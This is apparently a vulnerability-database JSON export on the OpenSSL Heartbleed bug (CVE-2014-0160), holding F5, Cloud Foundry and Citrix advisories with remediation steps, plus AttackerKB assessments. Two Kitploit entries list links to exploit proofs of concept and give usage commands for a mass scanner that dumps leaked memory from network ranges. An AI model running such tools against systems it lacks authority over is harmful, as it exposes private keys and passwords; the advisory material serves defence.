As a result, you must recreate the GTM sync groups and rediscover devices managed by Enterprise Manager.\n\nCMI certificate/key pairs\n\nThe BIG-IP system may have a centralized management infrastructure (CMI) certificate/key pair (used for device group communication and synchronization) that was compromised. To regenerate the CMI certificate/key pairs on devices in a device group, and rebuild the device trust, perform the following procedure:\n\n**Impact of procedure**: F5 recommends that you perform this procedure during a maintenance window. This procedure causes the current device to lose connectivity with all other BIG-IP devices. Depending on the device group and traffic group configuration, the connectivity loss may result in an unintentional active-active condition that causes a traffic disruption. To prevent a standby device from going active, set the standby device in the device group to **Force Offline** before performing the procedure. Standby devices that were set to **Force Offline** should be set to **Release Offline** after performing the procedure.\n\n 1. Log in to the Configuration utility.\n 2. Navigate to **Device Management **> **Device Trust** > **Local Domain**.\n 3. Click **Reset Device Trust**.\n 4. Select the **Generate new self-signed authority** option.\n 5. Click **Update** (or **Next**).\n 6. 
Click **Finished**.\n\nRepeat this procedure for each device in the device group.\n\nAfter you complete the device trust reset on all devices, set up the device trust by performing the procedures described in the following articles:\n\n * [K13649: Creating a device group using the Configuration utility (11.x - 12.x)](<https://support.f5.com/csp/article/K13649>)\n * [K13639: Configuring a device group using tmsh](<https://support.f5.com/csp/article/K13639>)\n * [K13946: Troubleshooting ConfigSync and device service clustering issues (11.x - 13.x)](<https://support.f5.com/csp/article/K13946>)\n\nThe big3d process\n\nThe BIG-IP system may have a vulnerable version of the** big3d **process under the following conditions:\n\n * The BIG-IP GTM system is running 11.5.0 or 11.5.1.\n * The managed BIG-IP system is running a **big3d** process that was updated by an affected BIG-IP GTM system. For example, the **big3d** process included by default on a BIG-IP LTM system running 11.4.0 is not vulnerable by itself. However, if a BIG-IP GTM system running 11.5.0 or 11.5.1 installs **big3d** 11.5.0 on the BIG-IP LTM system, the BIG-IP LTM system becomes vulnerable due to the affected **big3d **process.\n * The Enterprise Manager system is running 3.1.1 HF1 or HF2.\n * The managed BIG-IP system is running a **big3d** process that was updated by an affected Enterprise Manager system. For example, the **big3d** process included by default on a BIG-IP LTM system running 11.4.0 is not vulnerable by itself. 
However, if an Enterprise Manager system running 3.1.1 HF1 or HF2 installs **big3d** on the BIG-IP LTM system, the BIG-IP LTM system becomes vulnerable due to the affected **big3d **process.\n\nAffected big3d versions\n\nThe following **big3d** versions are affected by this vulnerability:\n\n * big3d version 11.5.0.0.0.221 for Linux \n * big3d version 11.5.0.1.0.227 for Linux \n * big3d version 11.5.1.0.0.110 for Linux\n\nFor information about checking the **big3d** version currently installed on the system and installing updated** big3d **versions on managed systems, refer to [K13703: Overview of big3d version management](<https://support.f5.com/csp/article/K13703>).\n\nBIG-IP maintenance and user passwords\n\nThe maintenance and user passwords used to access the BIG-IP system may have been compromised. For information about changing user passwords, refer to the following documentation:\n\n * [K13121: Changing system maintenance account passwords (11.x - 14.x)](<https://support.f5.com/csp/article/K13121>)\n * _**BIG-IP TMOS: Concepts guide**_\n\n**Note**: For information about how to locate F5 product guides, refer to [K12453464: Finding product documentation on AskF5](<https://support.f5.com/csp/article/K12453464>).\n\nMitigating this vulnerability\n\nTo mitigate this vulnerability, you should consider the following recommendations:\n\n * Consider denying access to the Configuration utility and using only the command line and** tmsh** until the BIG-IP system is updated. If that is not possible, F5 recommends that you access the Configuration utility only over a secure network.\n * If SSL profiles are configured to use COMPAT ciphers, consider reconfiguring the profiles to use ciphers from the NATIVE SSL stack. 
For information about the NATIVE and COMPAT ciphers, refer to the following articles: \n * [K13163: SSL ciphers supported on BIG-IP platforms (11.x - 13.x)](<https://support.f5.com/csp/article/K13163>)\n * [K13171: Configuring the cipher strength for SSL profiles (11.x)](<https://support.f5.com/csp/article/K13171>)\n * [K13187: COMPAT SSL ciphers are no longer included in standard cipher strings](<https://support.f5.com/csp/article/K13187>)\n * Virtual servers that do not use SSL profiles and pass SSL traffic through to the back-end web servers will not protect the back-end resource servers. When possible, you should protect back-end resources by using SSL profiles to terminate SSL.\n\n * <http://heartbleed.com/>\n\n**Important**: The following DevCentral article contains additional information about using iRules to assist in mitigating this vulnerability when terminating TLS traffic on back-end servers. F5 does not officially support the iRules in the following article, and information in the article does not represent a fix for the vulnerability.\n\n * [DevCentral article: OpenSSL HeartBleed, CVE-2014-0160](<http://devcentral.f5.com/articles/openssl-heartbleed-cve-2014-0160>)\n * [K14783: Overview of the Client SSL profile (11.x - 13.x)](<https://support.f5.com/csp/article/K14783>)\n * [K12463: Overview of F5 Edge products](<https://support.f5.com/csp/article/K12463>)\n * [K13757: BIG-IP Edge Client version matrix](<https://support.f5.com/csp/article/K13757>)\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from 
F5](<https://support.f5.com/csp/article/K167>)\n * [K13123: Managing BIG-IP product hotfixes (11.x - 13.x)](<https://support.f5.com/csp/article/K13123>)\n * [K9502: BIG-IP hotfix matrix](<https://support.f5.com/csp/article/K9502>)\n * [K10322: FirePass hotfix matrix](<https://support.f5.com/csp/article/K10322>)\n", "edition": 1, "modified": "2019-07-30T19:46:00", "published": "2015-02-17T01:30:00", "id": "F5:K15159", "href": "https://support.f5.com/csp/article/K15159", "title": "OpenSSL vulnerability CVE-2014-0160", "type": "f5", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2016-09-26T17:23:23", "bulletinFamily": "software", "cvelist": ["CVE-2014-0160"], "edition": 1, "description": "**Important**: For the hotfixes noted previously, the included version of OpenSSL has not been changed. F5 has patched the existing version of OpenSSL to resolve this vulnerability. As a result, on a patched BIG-IP system, the OpenSSL version is still OpenSSL 1.0.1e-fips. For more information about installed hotfix versions, refer to SOL13123: Managing BIG-IP product hotfixes (11.x).\n\n**BIG-IP Edge Client fixes** \n\n\nThis issue has been fixed for BIG-IP Edge Clients for Windows, Mac OS, and Linux in BIG-IP APM 11.5.1 HF2, and 11.5.0 HF3. This issue has also been fixed for BIG-IP Edge Clients for Windows, Mac OS, and Linux in an engineering hotfix in other BIG-IP APM versions. You can obtain the engineering hotfix by contacting [F5 Technical Support](<http://www.f5.com/training-support/customer-support/contact/>) and referencing this article number and the associated ID number. Note that engineering hotfixes are intended to resolve a specific software issue until a suitable minor release, maintenance release, or cumulative hotfix rollup release is available that includes the software fix. 
For more information, refer to SOL8986: F5 software lifecycle policy.\n\nRecommended action\n\nYou can eliminate this vulnerability by running a version listed in the **Versions known to be not vulnerable** column. If the **Versions known to be not vulnerable** column does not list a version that is higher than the version you are running, then no upgrade candidate currently exists.\n\nUpgrading to a version known to be not vulnerable, or taking steps to mitigate this vulnerability, does not eliminate possible damage that may have already occurred as a result of this vulnerability. After upgrading to a version that is known to be not vulnerable, consider the following components that may have been compromised by this vulnerability:\n\nSSL profile certificate/key pairs\n\nThe BIG-IP SSL profiles may reference SSL certificate/key pairs that were compromised. For information about creating new SSL certificate/key pairs for SSL profiles, refer to the following articles:\n\n * SOL14620: Managing SSL certificates for BIG-IP systems\n * SOL14534: Creating SSL certificates and keys with OpenSSL (11.x) \n\n * SOL13579: Generating new default certificate and key pairs for BIG-IP SSL profiles\n\nBIG-IP device certificate/key pairs\n\nThe BIG-IP system may have a device certificate/key pair that was compromised. For information about creating new SSL certificate/key pairs, refer to the following articles:\n\n * SOL9114: Creating an SSL device certificate and key pair using OpenSSL\n * SOL7754: Renewing self-signed device certificates\n\n**Important**: After you generate a new device certificate and private key pair, you will need to re-establish device trusts. In addition, the device certificates are used for GTM sync groups and Enterprise Manager monitoring. 
As a result, you will need to recreate the GTM sync groups and rediscover devices managed by Enterprise Manager.\n\nCMI certificate/key pairs\n\nThe BIG-IP system may have a CMI certificate/key pair (used for device group communication and synchronization) that was compromised. To regenerate the CMI certificate/key pairs on devices in a device group, and rebuild the device trust, perform the following procedure:\n\n**Impact of procedure**: F5 recommends that you perform this procedure during a maintenance window. This procedure causes the current device to lose connectivity with all other BIG-IP devices. Depending on the device group and traffic group configuration, the connectivity loss may result in an unintentional active-active condition that causes a traffic disruption. To prevent a standby device from going active, set the standby device in the device group to **Force Offline** before performing the procedure. Standby devices that were set to **Force Offline** should be set to **Release Offline** after performing the procedure.\n\n 1. Log in to the Configuration utility.\n 2. Navigate to **Device Management **> **Device Trust** > **Local Domain**.\n 3. Click **Reset Device Trust**.\n 4. Select the **Generate new self-signed authority** option.\n 5. Click **Update** (or **Next**).\n 6. Click **Finished**.\n\nRepeat this procedure for each device in the device group. 
\n\n\nAfter you complete the device trust reset on all devices, set up the device trust by performing the procedures described in the following articles:\n\n * SOL13649: Creating a device group using the Configuration utility\n * SOL13639: Creating a device group using the Traffic Management Shell\n * SOL13946: Troubleshooting ConfigSync and device service clustering issues (11.x)\n\nThe big3d process \n\n\nThe BIG-IP system may have a vulnerable version of the** big3d **process under the following conditions:\n\n * The BIG-IP GTM system is running 11.5.0 or 11.5.1.\n * The managed BIG-IP system is running a **big3d** process that was updated by an affected BIG-IP GTM system. For example, the **big3d** process included by default on a BIG-IP LTM system running 11.4.0 is not vulnerable by itself. However, if a BIG-IP GTM system running 11.5.0 or 11.5.1 installs **big3d** 11.5.0 on the BIG-IP LTM system, the BIG-IP LTM system becomes vulnerable due to the affected **big3d **process.\n * The Enterprise Manager system is running 3.1.1 HF1 or HF2.\n * The managed BIG-IP system is running a **big3d** process that was updated by an affected Enterprise Manager system. For example, the **big3d** process included by default on a BIG-IP LTM system running 11.4.0 is not vulnerable by itself. 
However, if an Enterprise Manager system running 3.1.1 HF1 or HF2 installs **big3d** on the BIG-IP LTM system, the BIG-IP LTM system becomes vulnerable due to the affected **big3d **process.\n\n**Affected big3d versions**\n\nThe following **big3d** versions are affected by this vulnerability:\n\n * big3d version 11.5.0.0.0.221 for Linux \n\n * big3d version 11.5.0.1.0.227 for Linux \n\n * big3d version 11.5.1.0.0.110 for Linux \n\n\nFor information about checking the **big3d** version currently installed on the system and installing updated** big3d **versions on managed systems, refer to the following article:\n\n * SOL13703: Overview of big3d version management \n\n\nBIG-IP maintenance and user passwords \n\n\nThe maintenance and user passwords used to access the BIG-IP system may have been compromised. For information about changing user passwords, refer to the following documentation:\n\n * SOL13121: Changing system maintenance account passwords (11.x)\n * BIG-IP TMOS: Concepts guide \n\n\n**Mitigating this vulnerability**\n\nTo mitigate this vulnerability, you should consider the following recommendations: \n\n\n * Consider denying access to the Configuration utility and using only the command line and** tmsh** until the BIG-IP system is updated. If that is not possible, F5 recommends that you access the Configuration utility only over a secure network.\n * If SSL profiles are configured to use COMPAT ciphers, consider reconfiguring the profiles to use ciphers from the NATIVE SSL stack. For information about the NATIVE and COMPAT ciphers, refer to the following articles: \n \n\n * SOL13163: SSL ciphers supported on BIG-IP platforms (11.x)\n * SOL13171: Configuring the cipher strength for SSL profiles (11.x)\n * SOL13187: COMPAT SSL ciphers are no longer included in standard cipher strings\n * Virtual servers that do not use SSL profiles and pass SSL traffic through to the back-end web servers will not protect the back-end resource servers. 
When possible, you should protect back-end resources by using SSL profiles to terminate SSL. For more information about using iRules to protect the back-end servers, refer to the Supplemental Information section.\n\nSupplemental Information\n\n * [CVE-2014-0160](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160>)\n * <http://heartbleed.com/> \n \n**Important**: The following DevCentral article contains additional information about using iRules to assist in mitigating this vulnerability when terminating TLS traffic on back-end servers. F5 does not officially support the iRules in the following article, and information in the article does not represent a fix for the vulnerability.\n * [DevCentral article: OpenSSL HeartBleed, CVE-2014-0160](<http://devcentral.f5.com/articles/openssl-heartbleed-cve-2014-0160>)\n * SOL14783: Overview of the Client SSL profile (11.x)\n * SOL12463: Overview of F5 Edge products\n * SOL13757: BIG-IP Edge Client version matrix\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n * SOL13123: Managing BIG-IP product hotfixes (11.x)\n * SOL10025: Managing BIG-IP product hotfixes (10.x)\n * SOL9502: BIG-IP hotfix matrix\n * SOL10322: FirePass hotfix matrix\n", "modified": "2015-02-16T00:00:00", "published": "2014-04-08T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/15000/100/sol15159.html", "id": "SOL15159", "title": "SOL15159 - OpenSSL vulnerability CVE-2014-0160", "type": "f5", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "attackerkb": [{"lastseen": "2020-11-18T06:44:13", "bulletinFamily": "info", "cvelist": ["CVE-2014-0160"], "description": "The (1) TLS and (2) DTLS implementations in OpenSSL 
1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug.\n\n \n**Recent assessments:** \n \n**zeroSteiner** at April 13, 2020 8:54pm UTC reported:\n\nA missing boundary check causes versions of OpenSSL 1.0.1 \u2013 1.0.1f to be vulnerable to an out of bounds read as part of an SSL Heartbeat message. This vulnerability can be leveraged without authenticating in many instances to leak sensitive information such as passwords and private keys. Due to the vulnerability being in the OpenSSL library, exploits are implementation specific and may require changes to implement the applicable protocol.\n\nThe vulnerability was fixed in [this](<https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=96db902>) patch.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 5**dmelcher5151** at April 15, 2020 4:14pm UTC reported:\n\nA missing boundary check causes versions of OpenSSL 1.0.1 \u2013 1.0.1f to be vulnerable to an out of bounds read as part of an SSL Heartbeat message. This vulnerability can be leveraged without authenticating in many instances to leak sensitive information such as passwords and private keys. 
Due to the vulnerability being in the OpenSSL library, exploits are implementation specific and may require changes to implement the applicable protocol.\n\nThe vulnerability was fixed in [this](<https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=96db902>) patch.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 5\n", "modified": "2020-07-30T00:00:00", "published": "2014-04-07T00:00:00", "id": "AKB:D165638B-97C5-4C99-BFA0-70576DB52324", "href": "https://attackerkb.com/topics/8avLg1j8ou/cve-2014-0160-aka-heartbleed", "type": "attackerkb", "title": "CVE-2014-0160 (AKA: Heartbleed)", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "cloudfoundry": [{"lastseen": "2020-03-11T02:54:32", "bulletinFamily": "software", "cvelist": ["CVE-2014-0160"], "description": "CVE-2014-0160 Heartbleed\n\n# \n\nCritical\n\n# Vendor\n\nOpenSSL.org\n\n# Versions Affected\n\n * 1.0.1 through 1.0.1f\n\n# Description\n\nThe (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug.\n\n# Affected VMware Products and Versions\n\n_Severity is critical unless otherwise noted. 
\n_\n\n * vFabric Web Server 5.0.x, 5.1.x, 5.2.x, 5.3.x\n * vFabric GemFire Native Client 7.0.0.X, 7.0.1.X\n * VMware GemFire Native Client 7.0.2.X\n * VMware Command Center 2.0.x, 2.1.x\n * VMware App Suite Virtual Appliance 1.0.1.3\n\n# Mitigation\n\nUsers of affected versions should apply the following mitigation:\n\n * vFabric Web Server users (all versions) should apply the patch including version 1.0.1g of OpenSSL per the instructions posted here as soon as possible.\n * GemFire Native Client 7.0.X users should immediately upgrade to OpenSSL 1.0.1g or later or recompile their existing OpenSSL 1.0.1 installations with the -DOPENSSL_NO_HEARTBEATS option. See [CVE-2014-0160-GemFire-Native-Client](<http://gemfire.docs.pivotal.io/security/CVE-2014-0160-GemFire-Native-Client.pdf>) for more information.\n * Please see [this doc](<http://docs.pivotal.io/pivotalhd/advisories/CVE-2014-0160-Advisory-PCC.pdf>) for VMware Command Center.\n * VMware App Suite Virtual Appliance 1.0.1.3 users should upgrade to version 1.0.1.5 as soon as possible.\n\n# Credit\n\nThis bug was independently discovered by a team of security engineers (Riku, Antti and Matti) at Codenomicon and Neel Mehta of Google Security, who first reported it to the OpenSSL team. 
The Codenomicon team found the Heartbleed bug while improving the SafeGuard feature in Codenomicon\u2019s Defensics security testing tools and reported this bug to the NCSC-FI for vulnerability coordination and reporting to the OpenSSL team.\n\n# References\n\n * <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160>\n * <http://www.openssl.org/news/vulnerabilities.html>\n * <http://www.kb.cert.org/vuls/id/720951>\n * <http://heartbleed.com/>\n * <https://access.redhat.com/site/solutions/781793>\n\n# History\n\n2014-Apr-7: Initial vulnerability report published.\n", "edition": 6, "modified": "2014-04-10T00:00:00", "published": "2014-04-10T00:00:00", "id": "CFOUNDRY:51A1D2F1D196381CC46CAE44EB5F5940", "href": "https://www.cloudfoundry.org/blog/cve-2014-0160/", "title": "CVE-2014-0160 Heartbleed | Cloud Foundry", "type": "cloudfoundry", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "kitploit": [{"lastseen": "2020-02-25T04:38:44", "bulletinFamily": "tools", "cvelist": ["CVE-2014-0160"], "description": "[  ](<https://2.bp.blogspot.com/-Mbb_SUv_D74/U0XpU8smaLI/AAAAAAAACWI/jTkhKsqAzNE/s1600/heartbleed.png>)\n\n \n \n \n\n\n * A checker (site and tool) for CVE-2014-0160: [ https://github.com/FiloSottile/Heartbleed ](<https://github.com/FiloSottile/Heartbleed>)\n * ** ssltest.py ** : Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford [ http://pastebin.com/WmxzjkXJ ](<https://pastebin.com/WmxzjkXJ>)\n * ** SSL Server Test ** [ https://www.ssllabs.com/ssltest/index.html ](<https://www.ssllabs.com/ssltest/index.html>)\n * ** Metasploit Module: ** [ https://github.com/rapid7/metasploit-framework/pull/3206/files ](<https://github.com/rapid7/metasploit-framework/pull/3206/files>)\n * ** Nmap NSE script: ** Detects whether a server is vulnerable to the OpenSSL Heartbleed: [ https://svn.nmap.org/nmap/scripts/ssl-heartbleed.nse ](<https://svn.nmap.org/nmap/scripts/ssl-heartbleed.nse>)\n * ** Nmap NSE script: ** Quick'n'Dirty OpenVAS nasl 
wrapper for ssl_heartbleed based on ssl_cert_expiry.nas [ https://gist.github.com/RealRancor/10140249 ](<https://gist.github.com/RealRancor/10140249>)\n * ** Heartbleeder: ** Tests your servers for OpenSSL: [ https://github.com/titanous/heartbleeder?files=1 ](<https://github.com/titanous/heartbleeder?files=1>)\n * ** Heartbleed Attack POC and Mass Scanner: ** [ https://bitbucket.org/fb1h2s/cve-2014-0160 ](<https://bitbucket.org/fb1h2s/cve-2014-0160>)\n * ** Heartbleed Honeypot Script: ** [ http://packetstormsecurity.com/files/126068/hb_honeypot.pl.txt ](<http://packetstormsecurity.com/files/126068/hb_honeypot.pl.txt>)\n", "edition": 20, "modified": "2014-04-10T00:55:31", "published": "2014-04-10T00:55:31", "id": "KITPLOIT:8800200070735873517", "href": "http://www.kitploit.com/2014/04/collection-of-heartbleed-tools-openssl.html", "title": "Collection of Heartbleed Tools (OpenSSL CVE-2014-0160)", "type": "kitploit", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-04-07T04:43:38", "bulletinFamily": "tools", "cvelist": ["CVE-2014-0160"], "description": "[  ](<https://4.bp.blogspot.com/-skuQnYDMoeg/VgyaDSePF2I/AAAAAAAAErQ/_PvtuA7Eobc/s1600/Heartbleed_Scanner.png>)\n\n \n\n\n[  ](<https://4.bp.blogspot.com/-4_jmIXJOYP4/VgyazZV8McI/AAAAAAAAErY/0zg4jbkRndU/s1600/Heartbleed%2BScanner.png>)\n\n \n\n\nHeartbleed Vulnerability Scanner is a multiprotocol (HTTP, IMAP, SMTP, POP) CVE-2014-0160 scanning and automatic exploitation tool written with python. \n\n \n\n\nFor scanning wide ranges automatically, you can provide a network range in CIDR notation and an output file to dump the memory of vulnerable system to check after. \n\n\n \n\n\nHearbleed Vulnerability Scanner can also get targets from a list file. This is useful if you already have a list of systems using SSL services such as HTTPS, POP3S, SMTPS or IMAPS. 
\n \n \n git clone https://github.com/hybridus/heartbleedscanner.git\n\n \n** Sample usage ** \n \nTo scan your local 192.168.1.0/24 network for heartbleed vulnerability (https/443) and save the leaks into a file: \n\n \n \n python heartbleedscan.py -n 192.168.1.0/24 -f localscan.txt -r\n\n \nTo scan the same network against SMTP Over SSL/TLS and randomize the IP addresses \n\n \n \n python heartbleedscan.py -n 192.168.1.0/24 -p 25 -s SMTP -r\n\n \nIf you already have a target list which you created by using nmap/zmap \n\n \n \n python heartbleedscan.py -i targetlist.txt\n\n \n** Dependencies ** \n** \n** Before using Heartbleed Vulnerability Scanner, you should install ** python-netaddr ** package. \n \nCentOS or CentOS-like systems : \n\n \n \n yum install python-netaddr\n\n \nUbuntu or Debian-like systems : \n\n \n \n apt-get insall python-netaddr\n\n \n \n\n\n** [ Download Heartbleed Vulnerability Scanner ](<https://github.com/hybridus/heartbleedscanner>) **\n", "edition": 18, "modified": "2015-10-01T09:47:01", "published": "2015-10-01T09:47:01", "id": "KITPLOIT:7942195329946074809", "href": "http://www.kitploit.com/2015/10/heartbleed-vulnerability-scanner.html", "title": "Heartbleed Vulnerability Scanner - Network Scanner for OpenSSL Memory Leak (CVE-2014-0160)", "type": "kitploit", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "citrix": [{"lastseen": "2020-11-18T15:29:34", "bulletinFamily": "software", "cvelist": ["CVE-2014-0160", "CVE-2015-0160"], "description": "<section class=\"article-content\" data-swapid=\"ArticleContent\">\n<div class=\"content-block\" data-swapid=\"ContentBlock\"><div>\n<div>\n<p> <a name=\"TopOfPage\"></a></p>\n<p> <span> <b>Overview</b></span></p>\n<p> <span>A vulnerability has been recently disclosed in OpenSSL that could result in remote attackers being able to obtain sensitive data from the process address space of a vulnerable OpenSSL server or client. 
</span></p>\n<p> <span>The issue has been assigned the following CVE identifier and is also known as the Heartbleed vulnerability:</span></p>\n<p> <span>CVE-2014-0160: <u> <a href=\"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160\">https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160</a></u></span></p>\n<p> <span> <b>What Citrix is Doing</b></span></p>\n<p> <span>Citrix has analyzed the impact of this issue on currently supported products. The following sections of this advisory provide impact information on each product.</span></p>\n<p> <span> <b>Products That Require Citrix Updates:</b></span></p>\n<ul>\n<p> <span> <b>\u2022 HDX RealTime Optimization Pack for Microsoft Lync 2010:</b> This component is vulnerable to CVE-2014-0160. An updated version of this component has been released to address this issue. Citrix recommends customers deploy these patches as soon as possible. These patches can be found on our website at the following locations:</span></p>\n<p> <span>o Windows - <u> <a href=\"https://support.citrix.com/article/CTX140719\">https://support.citrix.com/article/CTX140719</a></u></span></p>\n<p> <span>o Mac - <u> <a href=\"https://support.citrix.com/article/CTX140730\">https://support.citrix.com/article/CTX140730</a></u></span></p>\n<p> <span>o Linux - <u> <a href=\"https://support.citrix.com/article/CTX140732\">https://support.citrix.com/article/CTX140732</a></u></span></p>\n<p> <span> <b>\u2022 Citrix XenMobile App Controller: </b>XenMobile App Controller versions 2.9 and 2.10 are vulnerable to CVE-2014-0160. Patches have been released to address this issue for both App controller 2.9 and 2.10. Citrix recommends that customers deploy these patches as soon as possible. These patches are available from the following location: <u> <a href=\"https://www.citrix.com/downloads/xenmobile/product-software.html\">https://www.citrix.com/downloads/xenmobile/product-software.html</a></u>. 
Further information on this can be found in the following blog post: <u> <a href=\"http://blogs.citrix.com/2014/04/15/citrix-xenmobile-security-advisory-for-heartbleed/\">http://blogs.citrix.com/2014/04/15/citrix-xenmobile-security-advisory-for-heartbleed/</a></u> <a name=\"P17_1652\"></a>.</span></p>\n<p> <span> <b>\u2022 Citrix XenMobile MDX Toolkit & SDK:</b> MDX Toolkit and SDK Versions 2.2.1 (XenMobile 8.6.1) and 2.3.61 (XenMobile 8.7) use a vulnerable version of OpenSSL when wrapping iOS applications. Enterprise-ready mobile apps on the Worx App Gallery that use this version of Worx SDK also use a vulnerable version of OpenSSL. Outgoing micro VPN network connections to Access Gateway from iOS applications that were wrapped, or Worx SDK enabled, with this version will be encapsulated in a TLS connection that uses a vulnerable version of OpenSSL. Citrix has released a new version of the MDX Toolkit & SDK for iOS and Android Build MDX Toolkit; this can be found on the Citrix website at the following address: <u> <a href=\"https://www.citrix.com/downloads/xenmobile/product-software.html\">https://www.citrix.com/downloads/xenmobile/product-software.html</a></u>. Wrapped Android applications make use of the underlying Android version of OpenSSL, Citrix advises customers to check with their device vendors to ensure that the underlying Android version is not vulnerable to CVE-2014-0160.</span></p>\n<p> <span> <b>\u2022 Citrix XenMobile Worx components for iOS:</b> Worx Home for iOS version 8.7 uses a vulnerable version of OpenSSL. A new version of this software, 8.7.1.27, can be downloaded from the Apple App Store at the following address: <u> <a href=\"https://itunes.apple.com/us/app/worx-home/id434682528?mt=8\">https://itunes.apple.com/us/app/worx-home/id434682528?mt=8</a></u>. Customers that are using wrapped versions of iOS Worx applications are also advised to review the guidance on the MDX Toolkit given above. 
</span></p>\n<p> <span> <b>\u2022 Receiver for BlackBerry:</b> The Receiver for BlackBerry 10 version 2.0.0.21 is vulnerable to CVE-2014-0160. A new version of the Receiver for BlackBerry 10, 2.0.0.22, can be downloaded from the BlackBerry World website at the following address: <u> <a href=\"http://appworld.blackberry.com/webstore/content/34621918\">http://appworld.blackberry.com/webstore/content/34621918</a></u>. Receiver for PlayBook version 1.0.0 and Receiver for BlackBerry version 2.2 are not vulnerable to CVE-2014-0160.</span></p>\n<p> <span> <b>\u2022 Citrix Licensing:</b> The Citrix License Server for Windows version 11.11.1, the Citrix License Server VPX version 11.12 and the Citrix Usage Collector are vulnerable to CVE-2014-0160. New versions of the License Server for Windows, 11.11.1.13017, and the License Server VPX, 11.12.14001, can be downloaded from the Citrix website at the following address: <u> <a href=\"https://www.citrix.com/downloads/licensing/license-server.html\">https://www.citrix.com/downloads/licensing/license-server.html</a></u> </span></p>\n<p> <span> <b>\u2022 Citrix CloudPlatform:</b> The TLS interface exposed by the Secondary Storage VM in Cloud Platform versions 4.2.0, 4.2.1-x and 4.3.0.0 use a version of OpenSSL that is vulnerable to CVE-2014-0160. Citrix has released updated system virtual machine templates to resolve this issue. Citrix recommends that customers update the system virtual machine templates to a patched version and then reboot any Secondary Storage VMs to ensure that the updated OpenSSL version is being used. Instructions on updating the system virtual machine templates can be found in the following Citrix knowledge base article <u> <a href=\"https://support.citrix.com/article/CTX200024\">https://support.citrix.com/article/CTX200024</a></u>.</span></p>\n<p> <span> <b>\u2022 Citrix XenClient XT:</b> XenClient XT versions 3.1.4, 3.2.0, and 3.2.1 are vulnerable to CVE-2014-0160. 
A new version of XenClient XT, 3.2.2, is available on the Citrix website at the following address: <u> <a href=\"https://www.citrix.com/downloads/xenclient/product-software/xenclient-xt-322.html\">https://www.citrix.com/downloads/xenclient/product-software/xenclient-xt-322.html</a></u>. The XenClient XT Synchronizer makes use of the platform provided OpenSSL library. Customers are advised to verify that the version of OpenSSL installed on the underlying Linux Operating System is not vulnerable to CVE-2014-0160.</span></p>\n<p> <span> <b>\u2022 Citrix XenClient Enterprise:</b> Some versions of XenClient Enterprise Engine are vulnerable to CVE-2014-0160. In deployments where the XenClient Synchronizer is only accessed via fully trusted networks, the level of exposure is reduced. The TLS libraries used by currently supported versions of the XenClient Enterprise Synchronizer are not vulnerable to CVE-2014-0160. The following versions of XenClient Enterprise Engine are vulnerable to CVE-2014-0160: </span></p>\n<p> <span>o 4.1.0, 4.1.1, 4.1.2, 4.1.3, and 4.1.4. Citrix has released a new version of the XenClient Enterprise engine, 4.1.5. This can be found at the following address: <u> <a href=\"https://www.citrix.com/downloads/xenclient/product-software/xenclient-enterprise-41.html\">https://www.citrix.com/downloads/xenclient/product-software/xenclient-enterprise-41.html</a></u></span></p>\n<p> <span>o 4.5.1, 4.5.2, 4.5.3, 4.5.4, and 4.5.5. Citrix has released a new version of the XenClient Enterprise engine, 4.5.6. This can be found at the following address: <u> <a href=\"https://www.citrix.com/downloads/xenclient/product-software/xenclient-enterprise-45\">https://www.citrix.com/downloads/xenclient/product-software/xenclient-enterprise-45</a></u></span></p>\n<p> <span>o 5.0.0, 5.0.1, 5.0.2, 5.0.3, 5.0.4 and 5.0.5. Citrix has released a new version of the XenClient Enterprise engine, 5.0.6. 
